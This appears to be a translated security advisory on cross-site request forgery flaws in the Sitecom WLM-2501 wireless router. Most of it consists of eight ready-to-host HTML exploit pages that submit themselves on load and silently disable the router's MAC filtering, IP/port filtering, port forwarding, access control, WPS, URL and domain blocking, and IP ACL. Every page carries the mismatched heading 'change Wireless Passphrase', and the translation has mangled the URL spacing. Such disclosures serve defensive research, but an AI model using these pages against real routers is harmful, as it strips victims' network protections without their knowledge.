Release date: 2012-03-21
Updated on: 2012-03-27
Affected Systems:
Sitecom WLM-2501
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52700
Sitecom WLM-2501 is a wireless modem router 300N, using the Web management interface, the default listening on the TCP/IP Port 80, the default Administrator is admin, the default IP address is 192.168.0.1.
The Sitecom WLM-2501 has multiple cross-site Request Forgery vulnerabilities that allow attackers to illegally access the affected device and perform some administrator operations to change the following router parameters:
-Disable Mac Filtering
-Disable/Modify IP/Port Filtering
-Disable/Modify Port Forwarding
-Disable/Modify Wireless Access Control
-Disable Wi-Fi Protected Setup
-Disable/Modify URL Blocking Filter
-Disable/Modify Domain Blocking Filter
-Disable/Modify IP Address ACL
-Change Wireless Passphrase
-Enable/Modify Remote Access (also on WAN interface)
<* Source: Ivano Binetti
Link: http://www.webapp-security.com/2012/03/sitecom-wlm-2501-multiple-csrf-vulnerabilities/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Ivano Binetti () provides the following test methods:
3.1 Disable Mac Filtering
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/admin/formFilter">
<Input type = "hidden" name = "outAct" value = "1"/>
<Input type = "hidden" name = "inAct" value = "1"/>
<Input type = "hidden" name = "setMacDft" value = "Apply"/>
<Input type = "hidden" name = "submit-url" value = "/fw-macfilter.asp"/>
</Form>
</Body>
</Html>
3.2 Disable IP/Port Filtering
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/formFilter">
<Input type = "hidden" name = "outAct" value = "1"/>
<Input type = "hidden" name = "inAct" value = "1"/>
<Input type = "hidden" name = "setDefaultAction" value = "Apply"/>
<Input type = "hidden" name = "submit-url" value = "/fw-ipportfilter.asp"/>
</Form>
</Body>
</Html>
3.3 Disable Port Forwarding
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/formPortFw">
<Input type = "hidden" name = "portFwcap" value = "0"/>
<Input type = "hidden" name = "apply" value = "Apply"/>
<Input type = "hidden" name = "select_id" value = ""/>
<Input type = "hidden" name = "submit-url" value = "/fw-portfw.asp"/>
</Form>
</Body>
</Html>
3.4 Disable Wireless Access Control
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/admin/formWlAc">
<Input type = "hidden" name = "wlanAcEnabled" value = "0"/>
<Input type = "hidden" name = "setFilterMode" value = "Apply"/>
<Input type = "hidden" name = "submit-url" value = "/wlactrl. asp"/>
</Form>
</Body>
</Html>
3.5 Disable Wi-Fi Protected Setup
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/formWsc">
<Input type = "hidden" name = "wlanDisabled" value = "OFF"/>
<Input type = "hidden" name = "disableWPS" value = "ON"/>
<Input type = "hidden" name = "submit-url" value = "/wlwps. asp"/>
<Input type = "hidden" name = "save" value = "Apply"/>
</Form>
</Body>
</Html>
3.6 Disable URL Blocking Filter
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/formURL">
<Input type = "hidden" name = "urlcap" value = "0"/>
<Input type = "hidden" name = "apply" value = "Apply"/>
<Input type = "hidden" name = "urlFQDN" value = ""/>
<Input type = "hidden" name = "Keywd" value = ""/>
<Input type = "hidden" name = "submit-url" value = "/url_blocking.asp"/>
</Form>
</Body>
</Html>
3.7 Disable Domain Blocking Filter
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/formDOMAINBLK">
<Input type = "hidden" name = "domainblkcap" value = "0"/>
<Input type = "hidden" name = "apply" value = "Apply"/>
<Input type = "hidden" name = "blkDomain" value = ""/>
<Input type = "hidden" name = "submit-url" value = "/domainblk. asp"/>
</Form>
</Body>
</Html>
3.8 Disable IP Address ACL Filter
<Html>
<Body onload = "javascript: document. forms [0]. submit ()">
<H2> CSRF Exploit to change Wireless Passphrase </H2>
<Form method = "POST" name = "form0" action = "http: // 192.168.0.1: 80/goform/admin/formACL">
<Input type = "hidden" name = "lan_ip" value = "192.168.0.1"/>
<Input type = "hidden" name = "lan_mask" value = "255.255.255.0"/>
<Input type = "hidden" name = "aclcap" value = "0"/>
<Input type = "hidden" name = "apply" value = "Apply"/>
<Input type = "hidden" name = "enable" value = "1"/>
<Input type = "hidden" name = "interface" value = "0"/>
<Input type = "hidden" name = "aclIP" value = ""/>
<Input type = "hidden" name = "aclMask" value = ""/>
<Input type = "hidden" name = "submit-url" value = "/acl. asp"/>
</Form>
</Body>
</Html>
+ ---------------------------------------------
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sitecom
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.sitecom.com/wireless-modem-router-300n/p/859